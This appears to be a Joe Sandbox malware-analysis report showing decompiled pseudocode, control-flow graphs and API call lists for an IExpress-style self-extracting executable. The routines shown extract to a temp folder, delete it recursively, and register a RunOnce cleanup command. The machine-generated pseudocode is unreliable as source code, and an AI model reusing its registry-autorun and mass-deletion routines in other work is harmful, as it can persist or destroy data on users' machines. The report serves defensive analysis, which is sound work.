                                                                        control_flow_graph 406 f32f1d-f32f3d 407 f32f3f-f32f46 406->407 408 f32f6c-f32f73 call f35164 406->408 409 f32f48 call f351e5 407->409 410 f32f5f-f32f66 call f33a3f 407->410 415 f33041 408->415 416 f32f79-f32f80 call f355a0 408->416 417 f32f4d-f32f4f 409->417 410->408 410->415 420 f33043-f33053 call f36ce0 415->420 416->415 424 f32f86-f32fbe GetSystemDirectoryA call f3658a LoadLibraryA 416->424 417->415 421 f32f55-f32f5d 417->421 421->408 421->410 428 f32fc0-f32fd4 GetProcAddress 424->428 429 f32ff7-f33004 FreeLibrary 424->429 428->429 430 f32fd6-f32fee DecryptFileA 428->430 431 f33017-f33024 SetCurrentDirectoryA 429->431 432 f33006-f3300c 429->432 430->429 445 f32ff0-f32ff5 430->445 433 f33026-f3303c call f344b9 call f36285 431->433 434 f33054-f3305a 431->434 432->431 435 f3300e call f3621e 432->435 433->415 438 f33065-f3306c 434->438 439 f3305c call f33b26 434->439 443 f33013-f33015 435->443 441 f3306e-f33075 call f3256d 438->441 442 f3307c-f33089 438->442 451 f33061-f33063 439->451 452 f3307a 441->452 448 f330a1-f330a9 442->448 449 f3308b-f33091 442->449 443->415 443->431 445->429 455 f330b4-f330b7 448->455 456 f330ab-f330ad 448->456 449->448 453 f33093 call f33ba2 449->453 451->415 451->438 452->442 459 f33098-f3309a 453->459 455->420 456->455 458 f330af call f34169 456->458 458->455 459->415 461 f3309c 459->461 461->448
                                                                        C-Code - Quality: 82%
                                                                        			E00F32F1D(void* __ecx, int __edx) {
                                                                        				signed int _v8;
                                                                        				char _v272;
                                                                        				_Unknown_base(*)()* _v276;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t9;
                                                                        				void* _t11;
                                                                        				struct HWND__* _t12;
                                                                        				void* _t14;
                                                                        				int _t21;
                                                                        				signed int _t22;
                                                                        				signed int _t25;
                                                                        				intOrPtr* _t26;
                                                                        				signed int _t27;
                                                                        				void* _t30;
                                                                        				_Unknown_base(*)()* _t31;
                                                                        				void* _t34;
                                                                        				struct HINSTANCE__* _t36;
                                                                        				intOrPtr _t41;
                                                                        				intOrPtr* _t44;
                                                                        				signed int _t46;
                                                                        				int _t47;
                                                                        				void* _t58;
                                                                        				void* _t59;
                                                                        
                                                                        				_t43 = __edx;
                                                                        				_t9 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t9 ^ _t46;
                                                                        				if( *0xf38a38 != 0) {
                                                                        					L5:
                                                                        					_t11 = E00F35164(_t52);
                                                                        					_t53 = _t11;
                                                                        					if(_t11 == 0) {
                                                                        						L16:
                                                                        						_t12 = 0;
                                                                        						L17:
                                                                        						return E00F36CE0(_t12, _t36, _v8 ^ _t46, _t43, _t44, _t45);
                                                                        					}
                                                                        					_t14 = E00F355A0(_t53); // executed
                                                                        					if(_t14 == 0) {
                                                                        						goto L16;
                                                                        					} else {
                                                                        						_t45 = 0x105;
                                                                        						GetSystemDirectoryA( &_v272, 0x105);
                                                                        						_t43 = 0x105;
                                                                        						_t40 =  &_v272;
                                                                        						E00F3658A( &_v272, 0x105, "advapi32.dll");
                                                                        						_t36 = LoadLibraryA( &_v272);
                                                                        						_t44 = 0;
                                                                        						if(_t36 != 0) {
                                                                        							_t31 = GetProcAddress(_t36, "DecryptFileA");
                                                                        							_v276 = _t31;
                                                                        							if(_t31 != 0) {
                                                                        								_t45 = _t47;
                                                                        								_t40 = _t31;
                                                                        								 *0xf3a288("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\", 0); // executed
                                                                        								_v276();
                                                                        								if(_t47 != _t47) {
                                                                        									_t40 = 4;
                                                                        									asm("int 0x29");
                                                                        								}
                                                                        							}
                                                                        						}
                                                                        						FreeLibrary(_t36);
                                                                        						_t58 =  *0xf38a24 - _t44; // 0x0
                                                                        						if(_t58 != 0) {
                                                                        							L14:
                                                                        							_t21 = SetCurrentDirectoryA("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\"); // executed
                                                                        							if(_t21 != 0) {
                                                                        								__eflags =  *0xf38a2c - _t44; // 0x0
                                                                        								if(__eflags != 0) {
                                                                        									L20:
                                                                        									__eflags =  *0xf38d48 & 0x000000c0;
                                                                        									if(( *0xf38d48 & 0x000000c0) == 0) {
                                                                        										_t41 =  *0xf39a40; // 0x3, executed
                                                                        										_t26 = E00F3256D(_t41); // executed
                                                                        										_t44 = _t26;
                                                                        									}
                                                                        									_t22 =  *0xf38a24; // 0x0
                                                                        									 *0xf39a44 = _t44;
                                                                        									__eflags = _t22;
                                                                        									if(_t22 != 0) {
                                                                        										L26:
                                                                        										__eflags =  *0xf38a38;
                                                                        										if( *0xf38a38 == 0) {
                                                                        											__eflags = _t22;
                                                                        											if(__eflags == 0) {
                                                                        												E00F34169(__eflags);
                                                                        											}
                                                                        										}
                                                                        										_t12 = 1;
                                                                        										goto L17;
                                                                        									} else {
                                                                        										__eflags =  *0xf39a30 - _t22; // 0x0
                                                                        										if(__eflags != 0) {
                                                                        											goto L26;
                                                                        										}
                                                                        										_t25 = E00F33BA2(); // executed
                                                                        										__eflags = _t25;
                                                                        										if(_t25 == 0) {
                                                                        											goto L16;
                                                                        										}
                                                                        										_t22 =  *0xf38a24; // 0x0
                                                                        										goto L26;
                                                                        									}
                                                                        								}
                                                                        								_t27 = E00F33B26(_t40, _t44);
                                                                        								__eflags = _t27;
                                                                        								if(_t27 == 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L20;
                                                                        							}
                                                                        							_t43 = 0x4bc;
                                                                        							E00F344B9(0, 0x4bc, _t44, _t44, 0x10, _t44);
                                                                        							 *0xf39124 = E00F36285();
                                                                        							goto L16;
                                                                        						}
                                                                        						_t59 =  *0xf39a30 - _t44; // 0x0
                                                                        						if(_t59 != 0) {
                                                                        							goto L14;
                                                                        						}
                                                                        						_t30 = E00F3621E(); // executed
                                                                        						if(_t30 == 0) {
                                                                        							goto L16;
                                                                        						}
                                                                        						goto L14;
                                                                        					}
                                                                        				}
                                                                        				_t49 =  *0xf38a24;
                                                                        				if( *0xf38a24 != 0) {
                                                                        					L4:
                                                                        					_t34 = E00F33A3F(_t51);
                                                                        					_t52 = _t34;
                                                                        					if(_t34 == 0) {
                                                                        						goto L16;
                                                                        					}
                                                                        					goto L5;
                                                                        				}
                                                                        				if(E00F351E5(_t49) == 0) {
                                                                        					goto L16;
                                                                        				}
                                                                        				_t51 =  *0xf38a38;
                                                                        				if( *0xf38a38 != 0) {
                                                                        					goto L5;
                                                                        				}
                                                                        				goto L4;
                                                                        			}




























                                                                        0x00f32f1d
                                                                        0x00f32f28
                                                                        0x00f32f2f
                                                                        0x00f32f3d
                                                                        0x00f32f6c
                                                                        0x00f32f6c
                                                                        0x00f32f71
                                                                        0x00f32f73
                                                                        0x00f33041
                                                                        0x00f33041
                                                                        0x00f33043
                                                                        0x00f33053
                                                                        0x00f33053
                                                                        0x00f32f79
                                                                        0x00f32f80
                                                                        0x00000000
                                                                        0x00f32f86
                                                                        0x00f32f86
                                                                        0x00f32f93
                                                                        0x00f32f9e
                                                                        0x00f32fa0
                                                                        0x00f32fa6
                                                                        0x00f32fb8
                                                                        0x00f32fba
                                                                        0x00f32fbe
                                                                        0x00f32fc6
                                                                        0x00f32fcc
                                                                        0x00f32fd4
                                                                        0x00f32fd6
                                                                        0x00f32fd8
                                                                        0x00f32fe0
                                                                        0x00f32fe6
                                                                        0x00f32fee
                                                                        0x00f32ff0
                                                                        0x00f32ff5
                                                                        0x00f32ff5
                                                                        0x00f32fee
                                                                        0x00f32fd4
                                                                        0x00f32ff8
                                                                        0x00f32ffe
                                                                        0x00f33004
                                                                        0x00f33017
                                                                        0x00f3301c
                                                                        0x00f33024
                                                                        0x00f33054
                                                                        0x00f3305a
                                                                        0x00f33065
                                                                        0x00f33065
                                                                        0x00f3306c
                                                                        0x00f3306e
                                                                        0x00f33075
                                                                        0x00f3307a
                                                                        0x00f3307a
                                                                        0x00f3307c
                                                                        0x00f33081
                                                                        0x00f33087
                                                                        0x00f33089
                                                                        0x00f330a1
                                                                        0x00f330a1
                                                                        0x00f330a9
                                                                        0x00f330ab
                                                                        0x00f330ad
                                                                        0x00f330af
                                                                        0x00f330af
                                                                        0x00f330ad
                                                                        0x00f330b6
                                                                        0x00000000
                                                                        0x00f3308b
                                                                        0x00f3308b
                                                                        0x00f33091
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33093
                                                                        0x00f33098
                                                                        0x00f3309a
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3309c
                                                                        0x00000000
                                                                        0x00f3309c
                                                                        0x00f33089
                                                                        0x00f3305c
                                                                        0x00f33061
                                                                        0x00f33063
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33063
                                                                        0x00f3302b
                                                                        0x00f33032
                                                                        0x00f3303c
                                                                        0x00000000
                                                                        0x00f3303c
                                                                        0x00f33006
                                                                        0x00f3300c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f3300e
                                                                        0x00f33015
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f33015
                                                                        0x00f32f80
                                                                        0x00f32f3f
                                                                        0x00f32f46
                                                                        0x00f32f5f
                                                                        0x00f32f5f
                                                                        0x00f32f64
                                                                        0x00f32f66
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32f66
                                                                        0x00f32f4f
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32f55
                                                                        0x00f32f5d
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000

                                                                        APIs
                                                                        • GetSystemDirectoryA.KERNEL32 ref: 00F32F93
                                                                        • LoadLibraryA.KERNEL32(?,advapi32.dll), ref: 00F32FB2
                                                                        • GetProcAddress.KERNEL32(00000000,DecryptFileA), ref: 00F32FC6
                                                                        • DecryptFileA.ADVAPI32 ref: 00F32FE6
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 00F32FF8
                                                                        • SetCurrentDirectoryA.KERNELBASE(C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\), ref: 00F3301C
                                                                          • Part of subcall function 00F351E5: LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00F32F4D,?,00000002,00000000), ref: 00F35201
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: DirectoryLibrary$AddressAllocCurrentDecryptFileFreeLoadLocalProcSystem
                                                                        • String ID: C:\Users\user~1\AppData\Local\Temp\IXP001.TMP\$DecryptFileA$advapi32.dll
                                                                        • API String ID: 2126469477-1230860006
                                                                        • Opcode ID: 7654d87dc972e9e82381b397ed4121d36e7014945ca24ff4284b208cecea7fba
                                                                        • Instruction ID: 8566ff4632eac67fdf24746bc968ba4cee672b886af7712ea87ad8c621b60e00
                                                                        • Opcode Fuzzy Hash: 7654d87dc972e9e82381b397ed4121d36e7014945ca24ff4284b208cecea7fba
                                                                        • Instruction Fuzzy Hash: C7419671E003099ADF38EB72DC4565A73AAAB547B4F010165F941D2191EFBCCF81FA61
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 86%
                                                                        			E00F32390(CHAR* __ecx) {
                                                                        				signed int _v8;
                                                                        				char _v276;
                                                                        				char _v280;
                                                                        				char _v284;
                                                                        				struct _WIN32_FIND_DATAA _v596;
                                                                        				struct _WIN32_FIND_DATAA _v604;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t21;
                                                                        				int _t36;
                                                                        				void* _t46;
                                                                        				void* _t62;
                                                                        				void* _t63;
                                                                        				CHAR* _t65;
                                                                        				void* _t66;
                                                                        				signed int _t67;
                                                                        				signed int _t69;
                                                                        
                                                                        				_t69 = (_t67 & 0xfffffff8) - 0x254;
                                                                        				_t21 =  *0xf38004; // 0xc69e30f7
                                                                        				_t22 = _t21 ^ _t69;
                                                                        				_v8 = _t21 ^ _t69;
                                                                        				_t65 = __ecx;
                                                                        				if(__ecx == 0 ||  *((char*)(__ecx)) == 0) {
                                                                        					L10:
                                                                        					_pop(_t62);
                                                                        					_pop(_t66);
                                                                        					_pop(_t46);
                                                                        					return E00F36CE0(_t22, _t46, _v8 ^ _t69, _t58, _t62, _t66);
                                                                        				} else {
                                                                        					E00F31680( &_v276, 0x104, __ecx);
                                                                        					_t58 = 0x104;
                                                                        					E00F316B3( &_v280, 0x104, "*");
                                                                        					_t22 = FindFirstFileA( &_v284,  &_v604); // executed
                                                                        					_t63 = _t22;
                                                                        					if(_t63 == 0xffffffff) {
                                                                        						goto L10;
                                                                        					} else {
                                                                        						goto L3;
                                                                        					}
                                                                        					do {
                                                                        						L3:
                                                                        						_t58 = 0x104;
                                                                        						E00F31680( &_v276, 0x104, _t65);
                                                                        						if((_v604.ftCreationTime & 0x00000010) == 0) {
                                                                        							_t58 = 0x104;
                                                                        							E00F316B3( &_v276, 0x104,  &(_v596.dwReserved1));
                                                                        							SetFileAttributesA( &_v280, 0x80);
                                                                        							DeleteFileA( &_v280);
                                                                        						} else {
                                                                        							if(lstrcmpA( &(_v596.dwReserved1), ".") != 0 && lstrcmpA( &(_v596.cFileName), "..") != 0) {
                                                                        								E00F316B3( &_v276, 0x104,  &(_v596.cFileName));
                                                                        								_t58 = 0x104;
                                                                        								E00F3658A( &_v280, 0x104, 0xf31140);
                                                                        								E00F32390( &_v284);
                                                                        							}
                                                                        						}
                                                                        						_t36 = FindNextFileA(_t63,  &_v596); // executed
                                                                        					} while (_t36 != 0);
                                                                        					FindClose(_t63); // executed
                                                                        					_t22 = RemoveDirectoryA(_t65); // executed
                                                                        					goto L10;
                                                                        				}
                                                                        			}





















                                                                        0x00f32398
                                                                        0x00f3239e
                                                                        0x00f323a3
                                                                        0x00f323a5
                                                                        0x00f323ae
                                                                        0x00f323b3
                                                                        0x00f324cb
                                                                        0x00f324d2
                                                                        0x00f324d3
                                                                        0x00f324d4
                                                                        0x00f324df
                                                                        0x00f323c2
                                                                        0x00f323d1
                                                                        0x00f323db
                                                                        0x00f323e4
                                                                        0x00f323f6
                                                                        0x00f323fc
                                                                        0x00f32401
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00f32407
                                                                        0x00f32407
                                                                        0x00f32408
                                                                        0x00f32411
                                                                        0x00f3241f
                                                                        0x00f3247a
                                                                        0x00f32483
                                                                        0x00f32495
                                                                        0x00f324a3
                                                                        0x00f32421
                                                                        0x00f3242f
                                                                        0x00f32453
                                                                        0x00f3245d
                                                                        0x00f32466
                                                                        0x00f32472
                                                                        0x00f32472
                                                                        0x00f3242f
                                                                        0x00f324af
                                                                        0x00f324b5
                                                                        0x00f324be
                                                                        0x00f324c5
                                                                        0x00000000
                                                                        0x00f324c5

                                                                        APIs
                                                                        • FindFirstFileA.KERNELBASE(?,00F38A3A,00F311F4,00F38A3A,00000000,?,?), ref: 00F323F6
                                                                        • lstrcmpA.KERNEL32(?,00F311F8), ref: 00F32427
                                                                        • lstrcmpA.KERNEL32(?,00F311FC), ref: 00F3243B
                                                                        • SetFileAttributesA.KERNEL32(?,00000080,?), ref: 00F32495
                                                                        • DeleteFileA.KERNEL32(?), ref: 00F324A3
                                                                        • FindNextFileA.KERNELBASE(00000000,00000010), ref: 00F324AF
                                                                        • FindClose.KERNELBASE(00000000), ref: 00F324BE
                                                                        • RemoveDirectoryA.KERNELBASE(00F38A3A), ref: 00F324C5
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: File$Find$lstrcmp$AttributesCloseDeleteDirectoryFirstNextRemove
                                                                        • String ID:
                                                                        • API String ID: 836429354-0
                                                                        • Opcode ID: 1db0fc4e622f3b9a0d8ef2df5df2030461dd59d7bf8c0763150201d238e65486
                                                                        • Instruction ID: bcbe3d646cc6b3d69582e6798abe3e907d5e8f5a5dd57cf7606e5d27e561ecc9
                                                                        • Opcode Fuzzy Hash: 1db0fc4e622f3b9a0d8ef2df5df2030461dd59d7bf8c0763150201d238e65486
                                                                        • Instruction Fuzzy Hash: F1319572604744ABC320EBA4CC89AEB73EDBFC4335F04492DB59586291EB78D90DE752
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 70%
                                                                        			E00F32BFB(struct HINSTANCE__* _a4, intOrPtr _a12) {
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				long _t4;
                                                                        				void* _t6;
                                                                        				intOrPtr _t7;
                                                                        				void* _t9;
                                                                        				struct HINSTANCE__* _t12;
                                                                        				intOrPtr* _t17;
                                                                        				signed char _t19;
                                                                        				intOrPtr* _t21;
                                                                        				void* _t22;
                                                                        				void* _t24;
                                                                        				intOrPtr _t32;
                                                                        
                                                                        				_t4 = GetVersion();
                                                                        				if(_t4 >= 0 && _t4 >= 6) {
                                                                        					_t12 = GetModuleHandleW(L"Kernel32.dll");
                                                                        					if(_t12 != 0) {
                                                                        						_t21 = GetProcAddress(_t12, "HeapSetInformation");
                                                                        						if(_t21 != 0) {
                                                                        							_t17 = _t21;
                                                                        							 *0xf3a288(0, 1, 0, 0);
                                                                        							 *_t21();
                                                                        							_t29 = _t24 - _t24;
                                                                        							if(_t24 != _t24) {
                                                                        								_t17 = 4;
                                                                        								asm("int 0x29");
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t20 = _a12;
                                                                        				_t18 = _a4;
                                                                        				 *0xf39124 = 0;
                                                                        				if(E00F32CAA(_a4, _a12, _t29, _t17) != 0) {
                                                                        					_t9 = E00F32F1D(_t18, _t20); // executed
                                                                        					_t22 = _t9; // executed
                                                                        					E00F352B6(0, _t18, _t21, _t22); // executed
                                                                        					if(_t22 != 0) {
                                                                        						_t32 =  *0xf38a3a; // 0x0
                                                                        						if(_t32 == 0) {
                                                                        							_t19 =  *0xf39a2c; // 0x0
                                                                        							if((_t19 & 0x00000001) != 0) {
                                                                        								E00F31F90(_t19, _t21, _t22);
                                                                        							}
                                                                        						}
                                                                        					}
                                                                        				}
                                                                        				_t6 =  *0xf38588; // 0x0
                                                                        				if(_t6 != 0) {
                                                                        					CloseHandle(_t6);
                                                                        				}
                                                                        				_t7 =  *0xf39124; // 0x0
                                                                        				return _t7;
                                                                        			}


















                                                                        0x00f32c03
                                                                        0x00f32c0d
                                                                        0x00f32c18
                                                                        0x00f32c20
                                                                        0x00f32c2e
                                                                        0x00f32c32
                                                                        0x00f32c36
                                                                        0x00f32c3d
                                                                        0x00f32c43
                                                                        0x00f32c45
                                                                        0x00f32c47
                                                                        0x00f32c49
                                                                        0x00f32c4e
                                                                        0x00f32c4e
                                                                        0x00f32c47
                                                                        0x00f32c32
                                                                        0x00f32c20
                                                                        0x00f32c50
                                                                        0x00f32c54
                                                                        0x00f32c57
                                                                        0x00f32c64
                                                                        0x00f32c66
                                                                        0x00f32c6b
                                                                        0x00f32c6d
                                                                        0x00f32c74
                                                                        0x00f32c76
                                                                        0x00f32c7c
                                                                        0x00f32c7e
                                                                        0x00f32c87
                                                                        0x00f32c89
                                                                        0x00f32c89
                                                                        0x00f32c87
                                                                        0x00f32c7c
                                                                        0x00f32c74
                                                                        0x00f32c8e
                                                                        0x00f32c95
                                                                        0x00f32c98
                                                                        0x00f32c98
                                                                        0x00f32c9e
                                                                        0x00f32ca7

                                                                        APIs
                                                                        • GetVersion.KERNEL32(?,00000002,00000000,?,00F36BB0,00F30000,00000000,00000002,0000000A), ref: 00F32C03
                                                                        • GetModuleHandleW.KERNEL32(Kernel32.dll,?,00F36BB0,00F30000,00000000,00000002,0000000A), ref: 00F32C18
                                                                        • GetProcAddress.KERNEL32(00000000,HeapSetInformation), ref: 00F32C28
                                                                        • CloseHandle.KERNEL32(00000000,?,?,00F36BB0,00F30000,00000000,00000002,0000000A), ref: 00F32C98
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: Handle$AddressCloseModuleProcVersion
                                                                        • String ID: HeapSetInformation$Kernel32.dll
                                                                        • API String ID: 62482547-3460614246
                                                                        • Opcode ID: 19c3378f22f787eeab0b53b9ec5d5d68847efd3a39179f60347ff1b33f9f2e72
                                                                        • Instruction ID: 724c2df33bfc7905e2df47a82dbea46afb4cdb3b97471573ea5ac1131915ef18
                                                                        • Opcode Fuzzy Hash: 19c3378f22f787eeab0b53b9ec5d5d68847efd3a39179f60347ff1b33f9f2e72
                                                                        • Instruction Fuzzy Hash: 6711E571A00309ABDB607BB6AC88A6F375AAB847F0F141015F980E3290DA75DC01B6A2
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E00F36F40() {
                                                                        
                                                                        				SetUnhandledExceptionFilter(E00F36EF0); // executed
                                                                        				return 0;
                                                                        			}



                                                                        0x00f36f45
                                                                        0x00f36f4d

                                                                        APIs
                                                                        • SetUnhandledExceptionFilter.KERNELBASE(Function_00006EF0), ref: 00F36F45
                                                                        Memory Dump Source
                                                                        • Source File: 00000001.00000002.319721408.0000000000F31000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F30000, based on PE: true
                                                                        • Associated: 00000001.00000002.319714068.0000000000F30000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319734503.0000000000F38000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        • Associated: 00000001.00000002.319741169.0000000000F3C000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_1_2_f30000_bPsg.jbxd
                                                                        Similarity
                                                                        • API ID: ExceptionFilterUnhandled
                                                                        • String ID:
                                                                        • API String ID: 3192549508-0
                                                                        • Opcode ID: 8c281552e03e18a620c03b44833a1e83e8f776d25a598ba0f8af5c849c226d3a
                                                                        • Instruction ID: f7074f9b853668480f4e9000df7ddf982b9ad0ab9f3fb230a17b0718311d7d32
                                                                        • Opcode Fuzzy Hash: 8c281552e03e18a620c03b44833a1e83e8f776d25a598ba0f8af5c849c226d3a
                                                                        • Instruction Fuzzy Hash: 7B9002642511045796102B719D1D41976925B4D623F829460A051C8495DB6180847917
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Control-flow Graph

                                                                        C-Code - Quality: 93%
                                                                        			E00F3202A(struct HINSTANCE__* __edx) {
                                                                        				signed int _v8;
                                                                        				char _v268;
                                                                        				char _v528;
                                                                        				void* _v532;
                                                                        				int _v536;
                                                                        				int _v540;
                                                                        				void* __ebx;
                                                                        				void* __edi;
                                                                        				void* __esi;
                                                                        				signed int _t28;
                                                                        				long _t36;
                                                                        				long _t41;
                                                                        				struct HINSTANCE__* _t46;
                                                                        				intOrPtr _t49;
                                                                        				intOrPtr _t50;
                                                                        				CHAR* _t54;
                                                                        				void _t56;
                                                                        				signed int _t66;
                                                                        				intOrPtr* _t72;
                                                                        				void* _t73;
                                                                        				void* _t75;
                                                                        				void* _t80;
                                                                        				intOrPtr* _t81;
                                                                        				void* _t86;
                                                                        				void* _t87;
                                                                        				void* _t90;
                                                                        				_Unknown_base(*)()* _t91;
                                                                        				signed int _t93;
                                                                        				void* _t94;
                                                                        				void* _t95;
                                                                        
                                                                        				_t79 = __edx;
                                                                        				_t28 =  *0xf38004; // 0xc69e30f7
                                                                        				_v8 = _t28 ^ _t93;
                                                                        				_t84 = 0x104;
                                                                        				memset( &_v268, 0, 0x104);
                                                                        				memset( &_v528, 0, 0x104);
                                                                        				_t95 = _t94 + 0x18;
                                                                        				_t66 = 0;
                                                                        				_t36 = RegCreateKeyExA(0x80000002, "Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce", 0, 0, 0, 0x2001f, 0,  &_v532,  &_v536); // executed
                                                                        				if(_t36 != 0) {
                                                                        					L24:
                                                                        					return E00F36CE0(_t36, _t66, _v8 ^ _t93, _t79, _t84, _t86);
                                                                        				}
                                                                        				_push(_t86);
                                                                        				_t87 = 0;
                                                                        				while(1) {
                                                                        					E00F3171E("wextract_cleanup1", 0x50, "wextract_cleanup%d", _t87);
                                                                        					_t95 = _t95 + 0x10;
                                                                        					_t41 = RegQueryValueExA(_v532, "wextract_cleanup1", 0, 0, 0,  &_v540); // executed
                                                                        					if(_t41 != 0) {
                                                                        						break;
                                                                        					}
                                                                        					_t87 = _t87 + 1;
                                                                        					if(_t87 < 0xc8) {
                                                                        						continue;
                                                                        					}
                                                                        					break;
                                                                        				}
                                                                        				if(_t87 != 0xc8) {
                                                                        					GetSystemDirectoryA( &_v528, _t84);
                                                                        					_t79 = _t84;
                                                                        					E00F3658A( &_v528, _t84, "advpack.dll");
                                                                        					_t46 = LoadLibraryA( &_v528); // executed
                                                                        					_t84 = _t46;
                                                                        					if(_t84 == 0) {
                                                                        						L10:
                                                                        						if(GetModuleFileNameA( *0xf39a3c,  &_v268, 0x104) == 0) {
                                                                        							L17:
                                                                        							_t36 = RegCloseKey(_v532);
                                                                        							L23:
                                                                        							_pop(_t86);
                                                                        							goto L24;
                                                                        						}
                                                                        						L11:
                                                                        						_t72 =  &_v268;
                                                                        						_t80 = _t72 + 1;
                                                                        						do {
                                                                        							_t49 =  *_t72;
                                                                        							_t72 = _t72 + 1;
                                                                        						} while (_t49 != 0);
                                                                        						_t73 = _t72 - _t80;
                                                                        						_t81 = 0xf391e4;
                                                                        						do {
                                                                        							_t50 =  *_t81;
                                                                        							_t81 = _t81 + 1;
                                                                        						} while (_t50 != 0);
                                                                        						_t84 = _t73 + 0x50 + _t81 - 0xf391e5;
                                                                        						_t90 = LocalAlloc(0x40, _t73 + 0x50 + _t81 - 0xf391e5);
                                                                        						if(_t90 != 0) {
                                                                        							 *0xf38580 = _t66 ^ 0x00000001;
                                                                        							_t54 = "rundll32.exe %sadvpack.dll,DelNodeRunDLL32 \"%s\"";
                                                                        							if(_t66 == 0) {
                                                                        								_t54 = "%s /D:%s";
                                                                        							}
                                                                        							_push("C:\Users\FRONTD~1\AppData\Local\Temp\IXP001.TMP\");
                                                                        							E00F3171E(_t90, _t84, _t54,  &_v268);
                                                                        							_t75 = _t90;
                                                                        							_t23 = _t75 + 1; // 0x1
                                                                        							_t79 = _t23;
                                                                        							do {
                                                                        								_t56 =  *_t75;
                                                                        								_t75 = _t75 + 1;
                                                                        							} while (_t56 != 0);
                                                                        							_t24 = _t75 - _t79 + 1; // 0x2
                                                                        							RegSetValueExA(_v532, "wextract_cleanup1", 0, 1, _t90, _t24); // executed
                                                                        							RegCloseKey(_v532); // executed
                                                                        							_t36 = LocalFree(_t90);
                                                                        							goto L23;
                                                                        						}
                                                                        						_t79 = 0x4b5;
                                                                        						E00F344B9(0, 0x4b5, _t51, _t51, 0x10, _t51);
                                                                        						goto L17;
                                                                        					}
                                                                        					_t91 = GetProcAddress(_t84, "DelNodeRunDLL32");
                                                                        					_t66 = 0 | _t91 != 0x00000000;
                                                                        					FreeLibrary(_t84); // executed
                                                                        					if(_t91 == 0) {
                                                                        						goto L10;
                                                                        					}
                                                                        					if(GetSystemDirectoryA( &_v268, 0x104) != 0) {
                                                                        						E00F3658A( &_v268, 0x104, 0xf31140);
                                                                        					}
                                                                        					goto L11;
                                                                        				}
                                                                        				_t36 = RegCloseKey(_v532);
                                                                        				 *0xf38530 = _t66;
                                                                        				goto L23;
                                                                        			}

































                                                                        0x00f3202a
                                                                        0x00f32035
